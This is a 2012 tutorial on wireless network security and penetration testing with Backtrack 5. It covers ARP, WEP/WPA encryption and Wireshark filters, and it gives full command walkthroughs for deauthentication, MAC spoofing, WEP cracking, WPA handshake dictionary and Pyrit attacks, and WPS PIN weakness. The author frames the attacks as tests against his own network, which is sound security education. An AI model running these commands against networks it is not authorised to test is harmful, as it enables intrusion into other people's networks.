Professional Documents
Culture Documents
Wireless Security and Pentest Tutorial Using Backtrack by Nuno Freitas - FileTrig (SaifR)
Wireless Security and Pentest Tutorial Using Backtrack by Nuno Freitas - FileTrig (SaifR)
PENTEST TUTORIAL
USING BACKTRACK
The tutorial about Network Security and Pentest using Backtrack that
covers Networking Basics, Wireless Networks Basics, Wireless Penetration
and Securing Wireless Networks.
Independent Study
by Nuno Freitas
27/05/2012
Nuno Freitas
Table of Contents
Nuno Freitas
Executive Summary
Over the past months Ive been learning about Network Security. Ive started reading
documents like this and so Im writing this tutorial not to teach anyone how to break
into their neighbors network and get free internet or valuable information. No. Im
writing this because even not being an expert, I hope that this could be useful to those
who dont know where to begin learning about it.
Backtrack, currently in it fifth version, Backtrack 5, is an operating system based
on Ubuntu GNU/Linux distribution and it is aimed at digital forensics and penetration
testing use. It is named after backtracking, a search algorithm.
Backtrack have tons of tools that could be useful, Ill be talking about some that already
come with Backtrack and some other that you need to install if you are using an older
version than Backtrack 5 R2. Ill add to this document how to install those programs.
Through the Document lets imagine Im an attacker, attacking Wireless Networks.
In this tutorial Ill be using one Computer, with Windows 7 and VMware installed with
Backtrack 5 R2, the attacker computer.
I will use two routers through the Tutorials because my old Router (Conceptronic
c54brs4) doesnt support WPS to use against Reaver so Ill use a TP-LINK TLWR841ND.
Dont forget, the attacker pc must be using a Wireless Card that supports packet
injection in order to perform some attacks.
Nuno Freitas
My Setup
Nuno Freitas
Before we start with the ARP Protocol, lets just remember what are Physical Addresses
and Logical Addresses.
Physical Addresses Its what we know as MAC (Media Access Control) which is
associated to a device. This address is composed by 48 bits (12 hexadecimal characters)
Logical Addresses They are what we often call as IP Address.
How does the ARP Protocol works?
In a network when a computer wants to find another one it has to know the IP of that
computer but the information inserted in the packets is the MAC Address of the
destination computer.
When you only know the IP you need to ask for the MAC. Using the ARP Protocol, that
resolves IP Addresses into MAC Addresses.
For example
Imagine a computer, lets just say Computer A, with an IP 192.168.2.105 and it wants
to communicate with a computer with an IP 192.168.2.100, Computer B.
4
Nuno Freitas
Computer A will check its ARP Table and if it doesnt possess Computer Bs MAC
Address it will send a message to the Address FF:FF:FF:FF:FF:FF asking the ARP
Address of Computer B.
(ARP REQUEST)
Then computer B will answer to Computer A sending him his Physical Address.
Computer A will add an Entry in its ARP Table with that same MAC Address
corresponding to Computers Bs IP. (ARP REPLY)
You can check your ARP Table by typing in a Command Prompt:
#arp -a
It is also possible to translate MAC Addresses into IP Addresses but the Protocol used
in that translation is the RARP Protocol (Reverse Address Resolution Protocol).
These are some of the most important Protocols in networking and some of the easiest
Protocols to understand.
Up ahead in this tutorial we will talk more about ARP Protocol.
Nuno Freitas
Nuno Freitas
Wireless Networks
There are two types of encryption in Wireless Networks, we have WEP that stands for
Wireless Equivalency Protocol and we have WPA which stands for Wi-Fi Protected
Access. In spite that WPA is more secure than WEP, both are vulnerable to different
types of attacks as we will see.
Nuno Freitas
WPA
Wi-Fi Protected Access (WPA) is a software/firmware improvement over WEP.
All regular WLAN-equipment that worked with WEP are able to be simply upgraded
and no new equipment needs to be bought. WPA is a trimmed-down version of
the 802.11i security standard that was developed by the IEEE 802.11 to replace WEP.
The TKIP (Temporal Key Integrity Protocol) encryption algorithm was developed for
WPA to provide improvements to WEP that could be fielded as firmware upgrades to
existing 802.11 devices. The WPA profile also provides optional support for the AESCCMP algorithm that is the preferred algorithm in 802.11i and WPA2.
WPA Enterprise provides RADIUS based authentication using 802.1x.
WPA Personal uses a pre-shared Shared Key (PSK) to establish the security using an 8
to 63 character passphrase. The PSK may also be entered as a 64 character hexadecimal
string.
Weak PSK passphrases can be broken using a dictionary attacks by capturing the fourway handshake when the client connects to the network or reconnects after being
deauthenticated.
WPA Personal is secure when used with good passphrases or a full 64-character
hexadecimal key. They should also not use WPS (Wireless Protected Setup) since a
huge vulnerability was discovered and can be already exploited.
TKIP
This stands for Temporal Key Integrity Protocol and the acronym is pronounced as teekip. This is part of the IEEE 802.11i standard. TKIP implements per-packet key
mixing with a re-keying system and also provides a message integrity check. These
avoid the problems of WEP.
EAP
The WPA-improvement over the IEEE 802.1X standard already improved the
authentication and authorization for access of wireless and wired LANs. In addition to
this, extra measures such as the Extensible Authentication Protocol (EAP) have initiated
an even greater amount of security. This, as EAP uses a central authentication server.
Unfortunately, during 2002 a Maryland professor discovered some shortcomings.
Nuno Freitas
802.11i security
The newest and most rigorous security to implement into WLAN's today is the 802.11i
RSN-standard. This full-fledged 802.11i standard (which uses WPA2) does require the
newest hardware (unlike WPA), thus potentially requiring the purchase of new
equipment. This new hardware required may be either AES-WRAP (an early version of
802.11i) or the newer and better AES-CCMP-equipment.
WPA2
WPA2 is a Wi-Fi Alliance branded version of the final 802.11i standard. The primary
enhancement over WPA is the inclusion of the AES-CCMP algorithm as a mandatory
feature. Both WPA and WPA2 support EAP authentication methods using RADIUS
servers and pre-shared key (PSK).
CCMP
CCMP stands for Counter Mode with Cipher Block Chaining Message Authentication
Code Protocol also known as (CCM mode Protocol) is an encryption protocol designed
for Wireless Networks products that implement the standards of the IEEE
802.11i amendment to the original IEEE 802.11 standard. CCMP is an enhanced data
cryptographic encapsulation mechanism designed for data confidentiality and based
upon the Counter Mode with CBC-MAC (CCM) of the AES standard. It was created to
address the vulnerabilities presented by TKIP, a protocol in WPA, and WEP, a dated,
insecure protocol.
802.11b
802.11b has a maximum raw data rate of 11 Mbit/s and uses the same media access
method defined in the original standard. 802.11b products appeared on the market in
early 2000, since 802.11b is a direct extension of the modulation technique defined in
the original standard. The dramatic increase in throughput of 802.11b (compared to the
original standard) along with simultaneous substantial price reductions led to the rapid
acceptance of 802.11b as the definitive wireless LAN technology.
802.11b devices suffer interference from other products operating in the 2.4 GHz band.
Devices operating in the 2.4 GHz range include: microwave ovens, Bluetooth devices,
baby monitors and cordless telephones.
802.11g
In June 2003, a third modulation standard was ratified: 802.11g. This works in the
2.4 GHz band (like 802.11b), but uses the same OFDM based transmission scheme as
9
Nuno Freitas
802.11n
802.11n is an amendment which improves upon the previous 802.11 standards by
adding multiple-input multiple-output antennas (MIMO). 802.11n operates on both the
2.4 GHz and the lesser used 5 GHz bands. The IEEE has approved the amendment and
it was published in October 2009. Prior to the final ratification, enterprises were already
migrating to 802.11n networks based on the Wi-Fi Alliance's certification of products
conforming to a 2007 draft of the 802.11n proposal.
10
Nuno Freitas
Software
During these next tutorials Ill be using some programs under Backtrack 5, so lets give
a brief explanation about what are those programs all about and what type of tasks they
can be used for.
Aircrack-ng
Aircrack-ng is a network software suite consisting of a detector, packet
sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless
LANs.
It works with any wireless network interface controller whose driver supports raw
monitoring mode and can sniff 802.11b, 802.11g and 802.11n traffic. The program runs
under Linux and Windows.
Features
The aircrack-ng software suite includes:
aircrack-ng - Cracks WEP and WPA (Dictionary attack) keys.
airdecap-ng - Decrypts WEP or WPA encrypted capture files with known key.
airmon-ng - Placing different cards in monitor mode.
aireplay-ng - Packet injector (Linux, and Windows).
airodump-ng - Packet sniffer: Places air traffic into PCAP or IVS files and shows
information about networks.
airtun-ng - Virtual tunnel interface creator.
airolib-ng - Stores and manages ESSID and password lists; Increases the KPS of WPA
attacks
packetforge-ng - Create encrypted packets for injection.
airbase-ng - Incorporates techniques for attacking client, as opposed to Access Points
airdecloak-ng - removes WEP cloaking from pcap files
airdriver-ng - Tools for managing wireless drivers
tkiptun-ng - WPA/TKIP attack
airserv-ng - allows you to access the wireless card from other computers.
buddy-ng - the helper server for easside-ng, run on a remote computer
easside-ng - a tool for communicating to an access point, without the WEP key
wesside-ng - automatic tool for recovering WEP key
11
Nuno Freitas
Wireshark
Wireshark is a free and open-source packet analyzer.
It is used for network troubleshooting, analysis, software and communications
protocol development, and education. Originally named Ethereal, in May 2006 the
project was renamed Wireshark due to trademark issues.
Wireshark is very useful since you can analyze every packet individually and
understand what is going on the airwaves since that Wireshark distinguishes all types of
packets travelling the wireless field.
Wireshark is cross-platform, using the GTK+ widget toolkit to implement its user
interface, and using pcap to capture packets; it runs on various Unix-like operating
systems including Linux, Mac OS X, BSD, and on Microsoft Windows.
Pyrit
Pyrit allows creating massive databases, pre-computing part of the IEEE 802.11
WPA/WPA2-PSK authentication phase in a space-time-tradeoff. Exploiting the
computational power of Many-Core- and other platforms through ATI-Stream, Nvidia
CUDA, OpenCL and VIA Padlock, it is currently by far the most powerful attack
against one of the worlds most used security-protocols.
Pyrit is free software. Everyone can inspect copy or modify it and share derived work
under the GNU General Public License v3+. It compiles and executes on a wide variety
of platforms including FreeBSD, MacOS X and Linux as operation-system and x86-,
alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc-processors. Pyrit is a very good
tool, although its not included in Backtrack 5. In pyrit attack tutorial I will also explain
how to install it.
Reaver
Reaver implements a brute force attack against Wifi Protected Setup (WPS) using PINs in order
to recover WPA/WPA2 passphrases.
Reaver has been designed to be a robust and practical attack against WPS, and has been tested
against a wide variety of access points and WPS implementations.
On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10
hours, depending on the AP. In practice, it will generally take half this time to guess the correct
WPS pin and recover the passphrase.
12
Nuno Freitas
Wireshark
So, as you might read before, Wireshark is a packet analyzer. Lets learn how to work
with that tool.
Remember that Wireshark can work on every interface you have. For example you can
create a monitor mode interface and use it on Wireshark, that way you will get every
packet in the Wireless airwaves and get a big number of packets.
As you already saw with airodump-ng in Aircrack-ng suite it is very easy to get
thousands of packets in minutes or even seconds, it depends on the traffic of the
network. It would be a trouble to find some data frames in the middle of all the beacon
frames, but Wireshark have the ability to filter by type of packet or by MAC Address.
With this we get comfortable when we are trying to find specifically types of packet and
get to them faster.
First lets talk about WLAN frames, it will help is with Wireshark and with networking
at all if we understand this.
There are three types of frames: Management Frames, Control Frames and Data Frames.
1. Management frames: They are responsible for maintaining communication between
the access points and wireless clients. There are ten types of Management Frames:
-
13
Nuno Freitas
with the Client, and (if accepted) reserves him some memory space and
establishes an association ID.
-
Beacon - The access point periodically sends a beacon frame to announce its
presence and relay information, such as timestamp, SSID, and other
parameters regarding the access point to Wireless Cards that are within
range. Wireless Cards continually scan all 802.11 radio channels and listen
to beacons as the basis for choosing which access point is best to associate
with.
14
Nuno Freitas
2. Control frames: Control frames are responsible for ensuring a proper exchange of
data between the access point and wireless clients. Control frames can have the
following sub-types:
- Request to Send (RTS)
- Clear to Send (CTS)
- Acknowledgement (ACK) Since 802.11 stations are not able to transmit and
receive at the same time, while a station is transmitting a frame, it is not able to
determine whether the frame was received or whether there was a collision.
Therefore, every time an 802.11 radio that received the frame will reply with a
14-octet acknowledgement (ACK) frame.
3. Data frames: Data frames carry the actual data sent on the wireless network. There
are no sub-types for data frames.
Now that it is explained the different types WLAN frames we are able to start with
Wireshark. This previous explanation about frames is important since in Wireshark you
will get hundreds of frames and you will need to filter them whether you need them or
not to simplify the process.
So, lets start with Wireshark. To start Wireshark, type wireskark& in the console.
But before we start sniffing the airwaves lets create a monitor mode device to sniff
every packet from every network in range. To do that just type:
#airmon-ng start wlan0
Wlan0 depends on your device, it could be wlan0, wlan1 It depends on the number of
Wireless cards you have connected and what you want to use.
To get used to it type:
#airmon-ng
The output will get from the shell will show you how many cards you have and their
Interface names.
After you have your Wireless card in monitor mode you will get a new interface, named
mon0, that new interface is a virtual interface which is nothing more than your wireless
card working on monitor mode.
Thats the interface we will use in Wireshark.
After you get Wireshark started you will get this window:
15
Nuno Freitas
This is the start window of Wireshark, to get started click in Interface List in Capture
below Wiresharks logo.
You will get the list of available devices that you can use to analyze packets going on
the network. Mon0 will monitor the airwaves on the available channels in your region
and eth1 or eth0 will monitor your wired network.
16
Nuno Freitas
This is Wireshark getting packets from the air. As you can see we have some ACK
frames, some data frames. You will get hundreds or even thousands of frames while you
are sniffing the packets. Imagine that we need to search for data frames well it would
be very difficult to find data frames in the middle of all the other frames, because there
are several types of frames and you are looking for only one type, thats where
Wireshark filter helps a lot.
17
Nuno Freitas
Wireshark Filters
Filter by Destination, Source and Port
eth.src With this filter you can filter by the source MAC Address (Ethernet).
Example: eth.src == 00:11:22:33:44:55
eth.dst With this filter you can filter by destination MAC Address (Ethernet).
Example: eth.dst == 00:11:22:33:44:55
wlan.addr This filter will filter packets by the source or destination MAC Address
(Wireless Card).
Example: wlan.addr == 00:11:22:33:44:55
wlan.sa With this filter you can filter by the source MAC Address (Wireless Card).
Example: wlan.sa == 00:11:22:33:44:55
wlan.da With this filter you can filter by destination MAC Address (Wireless Card).
Example: wlan.da == 00:11:22:33:44:55
wlan.bssid With this filter you can filter only the frames from an specific Access
Point by using the MAC Address (bssid).
Example: wlan.bssid == 00:11:22:33:44:55
ip.addr With this filter you can filter by source or destination IPv4 Address.
Example: ip.addr == 192.168.2.1
ip.dst With this filter you can filter by destination IPv4 Address.
Example: ip.addr == 192.168.2.1
ip.src With this filter you can filter by source IPv4 Address.
Example: ip.addr == 192.168.2.1
ipv6.addr With this filter you can filter by source or destination IPv6 Address.
Example: ipv6.addr == 2001::5
ipv6.src With this filter you can filter by source IPv6 Address.
Example: ipv6.addr == 2001::5
ipv6.dst With this filter you can filter by destination IPv6 Address.
Example: ipv6.dst == 2001::5
tcp.port With this filter you can filter packets by source or destination TCP port.
Example: tcp.port == 80
tcp.dstport With this filter you can filter packets by destination TCP port.
Example: tcp.dstport == 80
18
Nuno Freitas
tcp.srcport With this filter you can filter packets by source TCP port.
Example: tcp.srcport == 80
udp.port With this filter you can filter packets by source or destination UDP port.
Example: udp.port == 80
udp.dstport With this filter you can filter packets by destination UDP port.
Example: udp.dstport == 80
udp.srcport With this filter you can filter packets by source UDP port.
Example: udp.srcport == 80
Filter by Types of frames
wlan.fc.type == 0 With this filter you can filter only the Management frames.
wlan.fc.type == 1 With this filter you can filter only the Control frames.
wlan.fc.type == 2 With this filter you can filter only the Data frames.
Filter by Subtypes of frames
(wlan.fc.type == 0) && (wlan.fc.subtype == 1) With this filter you can filter only the
Authentication frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 2) With this filter you can filter only the
De-Authentication frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 3) With this filter you can filter only the
Association Request frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 4) With this filter you can filter only the
Association Response frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 5) With this filter you can filter only the
Re-Association Request frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 6) With this filter you can filter only the
Re-Association Response frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 12) With this filter you can filter only the
Dis-Association frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 8) With this filter you can filter only the
Beacon frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 9) With this filter you can filter only the
Probe Request frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 10) With this filter you can filter only the
Probe Response frames.
(wlan.fc.type == 1) && (wlan.fc.subtype == 1) With this filter you can filter only
Request to Send frames.
19
Nuno Freitas
(wlan.fc.type == 1) && (wlan.fc.subtype == 2) With this filter you can filter only
Clear to Send frames.
(wlan.fc.type == 1) && (wlan.fc.subtype == 3) With this filter you can filter only
Acknowledgement frames.
(wlan.fc.type == 2) With this filter you can filter only Data frames.
Filter Operators
!= - Exclude -With this operator you can exclude a filter option.
Image that you want to get all the Management Frames except Beacon Frames, you can
use (wlan.fc.type == 0) != (wlan.fc.subtype == 8)
&& - And- This operator can make a filter with two filter types.
If you want to filter only Authentication and De-Authentication frames, use
(wlan.fc.type == 0) == (wlan.fc.subtype == 1) && (wlan.fc.type == 0) == (wlan.fc.subtype == 2)
|| - Or Does exactly the same then AND but it will show filter 1 OR filter 2.
20
Nuno Freitas
Well there is no practical way to avoid those attacks. However it is simple to confirm if
you are being a victim of a Deauthentication Attack. To do that lets use Wireshark.
Well to get started I will use two computers in this example. One with Backtrack 5 and
the other with Windows 7. The Windows 7 machine is already connected to the
network, TP-LINK. The role that this machine is playing is simple, it will be the victim.
On the other hand I will use a second machine running Backtrack and it will be the
Attacker and the Monitor. I will be performing a Deauthentication attack and at the
same time monitoring the Airwaves for Deauthentication packets with Wireshark.
On your case, if you want to check if your being a victim of a Deauthentication attack
you can use a machine running Wireshark, which runs on Windows and Linux
So lets get started, first lets put our wireless card in Monitor mode.
#airmon-ng start wlan1
Then lets check the networks we can reach.
#airodump-ng mon0
Then attack your own network.
21
Nuno Freitas
Nuno Freitas
Fake Authentication
Fake Authentication is useful on WEP Attacks and it doesnt work under WPA
networks.
In WEP Cracking Attacks we will face two types of WEP Networks, one with Open
System Authentication and the other called Shared Key Authentication.
Open system Authentication is simple to perform Fake Authentications and you can
start whenever you want, however in Shared Key Authentication Networks you will
always need a connected client.
If the network doesnt have a connected client just wait until someone connects to the
network. We need someone from inside the network to show up because we will need a
140 bit keystream that will allow us to fake an authentication. Without that we cannot
authenticate. Remember that Open System authentication and Shared Key works
different.
Open System Fake Authentication
So, imagine that you already have your target figured it out.
In order for an access point to accept a packet, the source MAC address must already be
associated. If the source MAC address you are injecting is not associated with the
access point it will ignore the packet and sends out a "Deauthentication".
In this state, no new initialization vectors are created because the access point is
ignoring all the injected packets. The lack of association with the access point is the
single biggest reason why packet injection fails. At this point you are just connecting to
the access point and telling it you are here and want to talk to it, however this does not
give you any ability to transfer data.
23
Nuno Freitas
24
Nuno Freitas
Nuno Freitas
With this you are only looking at the targets network. As you saw before there was a
connected client, its MAC is 00:15:AF:A2:8D:98.
So lets deauthenticate him:
#aireplay-ng -0 10 -a 00:80:5A:28:B5:AB -h 00:15:AF:A2:8D:98 mon0
After you perform a deauthentication look to the top line in airodump-ng window there
is now a text saying 140 bytes keystream: 00:80:5A:28:B5:AB
This means we have captured the .xor file we were looking for to perform a fake
authentication.
Use the following command:
#aireplay-ng -1 0 -a 00:80:5A:28:B5:AB -c 00:15:AF:A2:8D:98
-y sharedkey-01-00:80:5A:28:B5:AB.xor wlan0
26
Nuno Freitas
27
Nuno Freitas
Mac Filtering
In some cases you might find some security barriers, like MAC Filtering, which is still
easy to break. Imagine that you are trying to Fake Authenticate with an AP and you are
getting an Error like this:
MAC Filtering is enabled on this network. To get through this security trick we need a
legit MAC Address which have permission to connect with the AP.
Run airodump-ng and wait until someone connects to that network or if someones
already connected use its MAC Address to spoof your own.
Nuno Freitas
This command will change Wlan1 device MAC Address into 00:15:AF:A2:8D:98.
Even if the client keeps connected to the Network you can begin to fake authenticate.
#aireplay-ng -1 10 -a 00:80:5A:28:B5:AB -h 00:15:AF:A2:8D:98 mon0
This time dont forget to use the spoofed MAC in -h option.
This brief explanation on what is Fake Authentication will help you in WEP Cracking
that we will see later in this tutorial. With this information you shouldnt have any
trouble by doing this trick and performing WEP Cracking.
29
Nuno Freitas
30
Nuno Freitas
4) Once enough IVs have been captured, run a cryptographic attack to decipher the
WEP key (aircrack-ng)
In this case, I will attack my own network so it is like if the attacker, me, had already
identified the WEP encrypted network he wants to crack. The information he will need
to start collecting IVs is the BSSID of the access point and the channel it is operating
on. This information is easy to get using airodump-ng and it will also be used to capture
the IVs and save them into a file. In this case the BSSID of the network we are trying to
crack 00:80:5A:28:B5:AB is, the channel is 11, and we will call the output file wepkey.
Lets put our card in monitor mode, but first you need to know the Interface to use:
#airmon-ng
You have now a list of interfaces that you have on your machine. If you have only one
wireless card you will have only one interface, if you have two wireless cards connected
you have two interfaces. I might use different cards through all the tutorials, when you
see wlan1 and your Interface is wlan0 you use wlan0 instead of wlan1.
Remember Im making the attacks on my machine and it could be different from yours.
So I will use wlan0 for this tutorial. To put that Interface on monitor mode use:
#airmon-ng start wlan0
By now you have the wlan1 Interface and the system created a new interface called
mon0. Well this is a virtual interface, basically mon comes from monitor it means
that the interface mon0 is monitoring traffic.
Now lets sniff traffic from the network that we will attack, so use:
#airodump-ng wlan0
31
Nuno Freitas
As I told you before this network Im attacking is mine. My network is called WLAN so
by using airodump-ng I already know the BSSID, the Channel. Lets get started:
#airodump-ng --channel 11 --bssid 00:80:5A:28:B5:AB --write wepkey wlan0
As we can see the #Data means the number of unique IVs we caught so far and saved
in wepkey.cap. It is possible that airodump-ng create some .cap files like wepkey01.cap, wepkey-02.cap, thats why in the end we will use in aircrack-ng wepkey*.cap.
The #/s is the number of Unique IVs that we get per second. As you can see there is
no traffic at all in this network and doing the math if we will try to get 50 000 IVs, we
would need to wait 25 000 seconds, almost 7 hours to get enough IVs, so why dont we
start a packet injection technique to speed up the unique IVs collection?
We can do that using aireplay-ng:
32
Nuno Freitas
33
Nuno Freitas
After you get the first Arp request you should be getting something like the image
above. Its just a matter of time until you get enough IVs to make a brute force attack.
Once you get around 50 000 you have a good chance of crack the network.
However if you fail, just repeat the process. Get more IVs and try again. Youll need
more IVs depending on how big is the key. There are 64-bit keys, 128-bit keys and 152bit keys, more bits means more password combinations possible and we might need
more IVs to crack the password. So if you fail with 50 000 get more IVs and you will
get the key.
As you know the captured data packets containing IVs are stored in the file that I called
wepkey outputted by airodump-ng. The program will write multiple files to the active
directory in different formats, but the one we are interested is the .cap files.
To perform the crack use wepkey*.cap since it could write more than one .cap file, for
example wepkey-01.cap, wepkey-02.cap
The attack starts with this command:
#aircrack-ng -b 00:80:5A:28:B5:AB wepkey*.cap wlan0
34
Nuno Freitas
So as you can see it found the WEP key of the network. The key I used for this example
was abcdef1234 and as you see in aircrack-ng output KEY FOUND!
[AB:CD:EF:12:34]
This was the example of how to break a WEP network with an already authenticated
client. When you dont have any clients connected to the network you want to break,
you should do a different type of attack, lets find out how we can do it.
35
Nuno Freitas
Nuno Freitas
37
Nuno Freitas
So after you perform a fake authentication you need to wait until you get a packet to
perform an attack, I kept a console window performing fake authentications at every
second as you can see, so I dont get deauthenticated by any reason and another one
with the chopchop attack waiting for a packet to start.
When the console asks you Use this packet? press y and then ENTER to start the
chopchop attack.
Wait a few seconds for the chopchop attack to make its magic. The file replay_dec0917-223734.xor as you can see above can now be used in the next step to generate an
Arp packet.
38
Nuno Freitas
The objective is to have the access point rebroadcast the injected Arp packet. When it
rebroadcasts it, a new IV is obtained. All these new IVs will ultimately be used to crack
the WEP key.
Use the following command:
#packetforge-ng -0 -a 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 -k 255.255.255.255
-l 255.255.255.255 -y replay_dec-0917-223734.xor -w arp-request
39
Nuno Freitas
40
Nuno Freitas
So as you can see it found the WEP key of the network. The key I used for this example
was 1234567890 and as you see in aircrack-ng output KEY FOUND!
[12:34:56:78:90]
41
Nuno Freitas
Using this we will sniff all the packets from WLAN network and save them in files
called wepska. We will need to perform a deauthentication on an authenticated client in
order to capture the shared key 140 bit keystream.
42
Nuno Freitas
After you perform a deauthentication look to the top line in airodump-ng window there
is now a text saying 140 bytes keystream: 00:80:5A:28:B5:AB
This means we have captured the .xor file we were looking for to perform a fake
authentication.
Use the following command:
#aireplay-ng -1 0 -a 00:80:5A:28:B5:AB -c 00:15:AF:A2:8D:98
-y wepska-01-00:80:5A:28:B5:AB.xor wlan0
Remember to always change the packets name from what I have to what you get. They
might be different.
Nuno Freitas
Wait until you get a packet to use in the attack. When the system asks you Use this
packet? press y and then ENTER to use it, and you will get a fragment that we will
use to create an Arp Request.
Basically this is the same that we did before on WEP Open System without connected
clients.
As you can see in the output of the fragmentation attack you got now a file called
fragment-0921-140138.xor or something similar.
Lets now create an arp-request. Use the following command:
44
Nuno Freitas
This command will create an arp-request based in that fragment. Now we need to inject
that packet in the airwaves and it will provoke the AP to respond to it with new IVs.
#aireplay-ng -2 -b 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 -r arp-request wlan0
You should have the airodump-ng window sniffing them and saving the files, as I
used above those packets are being saved in the file wepska*.cap. When we got
enough IVs we will crack the WEP key. When we get around 50000 IVs use the
following command:
Ok, when you got enough IVs lets perform the bruteforce attack:
#aircrack-ng -b 00:80:5A:28:B5:AB wepska*.cap
45
Nuno Freitas
As you can see the key was successfully cracked. The key for this example as
1234567890 and as you can see in the image KEY FOUND: [12:34:56:78:90]. So this
is everything about WEP. Lets see now the WPA part of this tutorial.
46
Nuno Freitas
47
Nuno Freitas
48
Nuno Freitas
The number after --deauth is the number of deauthentication packets aireplay-ng will send.
A higher number will increase the probability of it working, but is less stealthy.
The deauthentication was done and now we have got the four-way handshake.
Once the handshake has been captured, the attacker can stop capturing all packets. The
information contained in the handshake is all that is needed to crack to WPA
passphrase.
Once the attacker has the handshake it is possible to crack the passphrase with
dictionary techniques. This technique uses a wordlist and goes through each word one at
a time, encrypting it with the other data gathered (the SSID and others) to see if it
matches. When a match occurs, the word from the list is the passphrase used.
This can be extremely time consuming depending on the complexity of the
passphrase, the size of the dictionary file and the speed of your CPU. An attacker is
limited by his processor speed to how many passwords he can try per second.
With dictionary files containing millions and millions of different combinations of
letters, words and numbers, the process could take a very long time.
49
Nuno Freitas
Fortunately, most consumers choose simple, easy to remember passphrases that can be
decrypted using smaller dictionary files containing common names and passwords.
The program aircrack-ng can be used to crack the handshake. The attacker must have a
word list on his system. Backtrack includes several wordlists of different sizes, and
larger ones can be downloaded from the internet.
To use a word list with aircrack-ng and our captured handshake use this command:
#aircrack-ng -w /pentest/passwords/wordlists/wpa.txt wpakey*.cap
The output will look like this when aircrack-ng gets the password:
It took a little bit more than 20 minutes to discover the Wireless AP passphrase. The
attacker has now the ability to get inside the network. It took 954864 guesses to
discover the password. The dictionary file that I used it could be considered as a big
dictionary, you might not be able to avoid a successful attack by a determined attacker,
but you sure can make his work a lot harder if you use a strong password.
50
Nuno Freitas
Then do this:
sudo apt-get install libssl-dev
sudo apt-get install scapy
sudo apt-get install python-dev
Browse to pyrit directory:
cd /pyrit_svn/pyrit
And type:
sudo python setup.py build
sudo python setup.py install
Ok, now you have Pyrit installed and it should be up and running.
51
Nuno Freitas
So at this point you should get all the information about the network you will try to
attack. For this example we will attack a WPA encrypted network with WLAN as the
ESSID, 00:80:5A:28:B5:AB as the BSSID and working in channel 11.
Now we should begin sniffing only this network by using the following command:
#airodump-ng bssid 00:80:5A:28:B5:AB c 11 -2 wpahandshake wlan0
This will sniff the packets from WLAN and save them in a file called wpahandshake.
Once again I remember that we will be looking for the *.cap file in the end.
If a client is connected to the network make a deauthentication attack so the client needs
to re-authenticate and you get the handshake or if no one is connected, wait for someone
to do it.
#aireplay-ng -0 10 -a 00:80:5A:28:B5:AB -c 00:15:AF:A2:8D:98 wlan1
Now that you have the handshake, lets use pyrit.
Lets analyze our handshake file, use the following command in the command line:
#pyrit wpahandshake*.cap analyze
Note that wpahandshake*.cap is the name of the files that airodump-ng save with
packets sniffed from the victims network, they could be wpahandshake-01.cap,
wpahandshake-02.cap
You should get a window like this:
52
Nuno Freitas
The output is that the Access Point have the mac 00:80:5A:28:B5:AB with WLAN as
the ESSID.
It also says that the file captured an handshake from the client with mac address
00:15:AF:A2:8D:98.
So now lets start working with Pyrits database.
As you may know guessing the password used in WPA-PSK and WPA2-PSK is a
computational intensive task. During this process, 100% of your CPU is being used to
compute what is known as the Pairwise Master Key, a 256bit key derived from the
ESSID and a Password using the PBKDF2-HMAC-SHA1 algorithm. One of the major
weaknesses of the WPA-PSK is that the Pairwise Master Key has no elements that are
unique to the moment of the key-negotiation between Access Point and Sation. It is
therefore possible to pre-compute the Pairwise Master Key and store it for later use.
This is where Pyrits database kicks in. It can store ESSIDs, passwords and their
corresponding Pairwise Master Keys, possibly growing to the size of hundreds of
millions of entries. Starting with a fresh installation of Pyrit, your database will most
probably be empty.
Issue the following command to get an overview:
#pyrit eval
And you will get this output:
53
Nuno Freitas
This code is distributed under the GNU General Public License v3+
Connecting to storage at 'file://'... connected.
Passwords available: 0
Now that we have some passwords in the database, we have to create an ESSID, for
that, use the following command:
#pyrit e WLAN create_essid
Note that WLAN is our victims ESSID
Pyrit output will say that ESSID WLAN was created successfully and if you use the
eval command again it will show you that WLANs ESSID dont have any password
pre-computed.
So we have already some passwords in the database, and we have an ESSID created, we
need to pre-compute the passwords to use with that ESSID. This process could take
some minutes. It depends on how many passwords you have imported to the database.
To pre-compute the passwords with the ESSID you just created use this command:
#pyrit batch
Pyrit will give the output Batchprocessing done when it completes the process.
We can now use the Pairwise Master Keys stored in the database to attack the same
handshake as in the example above. Instead of running a passthrough-attack, where
the database is not touched at all, we issue a database-attack like the following:
54
Nuno Freitas
This process is much faster than a dictionary attack, as you can see the image above
Pyrit was trying 515375 passwords per second and gave us in the output that the
password is security. This process only takes more time pre-computing the passwords
with the ESSID, but will be useful when you have to use many dictionaries at the same
time.
55
Nuno Freitas
As you can see there is a network with a strange ESSID, it is something like <length: 1>
This is a hidden ESSID, and well be able to get the real ESSID by performing a
deauthentication to one of the connected clients.
Lets sniff only the hidden networks packets:
#airodump-ng --bssid 00:80:5A:28:B5:AB -c 11 -w hiddenwpa wlan0
Lets deauthenticate a client now:
#aireplay-ng -0 10 a 00:80:5A:28:B5:AB c 00:15:AF:A2:8D:98 wlan0
So, now that you deauthenticated a client you should have something like this:
56
Nuno Freitas
As you can see the network ESSID now changed to WLAN, by doing this we also got a
handshake so lets now crack the password:
#pyrit -e WLAN -r hiddenwpa-01.cap attack_db
This time we needed to add the -e parameter since its an hidden ESSID, pyrit cant
guess it. And we have the password, it is security.
57
Nuno Freitas
Doing the Math there would be 108 = (100 000 000) Pin combinations.
However an attacker can derive information about the correctness of parts the PIN from
the APs responses.
1. If the attacker receives an EAP-NACK message after sending M4, he knows that
the 1st half of the PIN was incorrect.
2. If the attacker receives an EAP-NACK message after sending M6, he knows that
the 2nd half of the PIN was incorrect.
This form of authentication dramatically decreases the maximum possible
authentication attempts needed from 108 = 100 000 000 to 104 + 104 = 20 000.
As the 8th digit of the PIN is always a checksum of digit one to digit seven, there are at
most 104 + 103 = 11 000 attempts needed to find the correct PIN.
